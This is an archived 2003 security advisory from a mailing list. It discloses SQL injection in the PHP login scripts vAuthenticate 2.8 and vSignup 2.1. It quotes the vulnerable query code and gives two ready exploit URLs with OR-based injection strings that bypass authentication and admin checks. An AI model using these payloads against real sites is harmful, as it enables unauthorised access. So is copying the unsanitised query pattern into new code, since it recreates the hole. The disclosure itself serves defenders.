vSignup, vAuthenticate (PHP)

From: Frog Man (leseulfrogat_private)
Date: Tue Jan 14 2003 - 08:38:58 PST

  • Next message: Floyd Russell: "Re: Opentype font file causes Windows to restart." 

    Informations :
°°°°°°°°°°°°°°
-----------------------
Product : vAuthenticate
Version : 2.8
-----------------------
Product : vSignup
Version : 2.1
-----------------------
Website : http://www.beanbug.net
Problem : SQL Injection


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
chgpwd.php :
-----------------------------------------------
<?
	if (!class_exists(auth))
	{
		include ("auth.php");
	}
		include ("authconfig.php");
		include ("check.php");
?>
-----------------------------------------------

admin/index.php :
------------------------------------------
<?
	if (!class_exists(auth))
	{
		include ("../auth.php");
	}
		include ("../authconfig.php");
		include ("../check.php");

	if ($check["level"] != 1)
	{
------------------------------------------


check.php :
------------------------------------------------------------------------
<?
	$CheckSecurity = new auth();
	$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
	if ($check == false)
	{
		// Feel free to change the error message below. Just make sure you put a 
"\" before
		// any double quote.
		print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" 
color=\"#FF0000\">";
		print "<b>Illegal Access</b>";
		print "</font><br>";
  		print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" 
color=\"#000000\">";
		print "<b>You do not have permission to view this page.</b></font>";

		exit; // End program execution. This will disable continuation of 
processing the rest of the page.
	}

?>
------------------------------------------------------------------------



auth.php :
------------------------------------------------------------------------
function page_check($username, $password) {
	$query = "SELECT * FROM authuser WHERE uname='$username' AND 
passwd='$password' AND status <> 'inactive'";
	$connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);

	// OLD CODE - DO NOT REMOVE
	// $result = mysql_db_query($this->DBNAME, $query);

	// REVISED CODE
	$SelectedDB = mysql_select_db($this->DBNAME);
	$result = mysql_query($query);

	$numrows = mysql_num_rows($result);
	$row = mysql_fetch_array($result);

	// CHECK IF THERE ARE RESULTS
	// Logic: If the number of rows of the resulting recordset is 0, that means 
that no
	// match was found. Meaning, wrong username-password combination.
	if ($numrows == 0) {
		return false;
	}
	else {
		return $row;
	}
} // End: function page_check
------------------------------------------------------------------------




Exploits :
°°°°°°°°°°
http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='

http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1



Patchs :
°°°°°°°°
A patch can be found on http://www.phpsecure.org.



More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! 
http://search.msn.fr/worldwide.asp

    This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 21:54:57 PST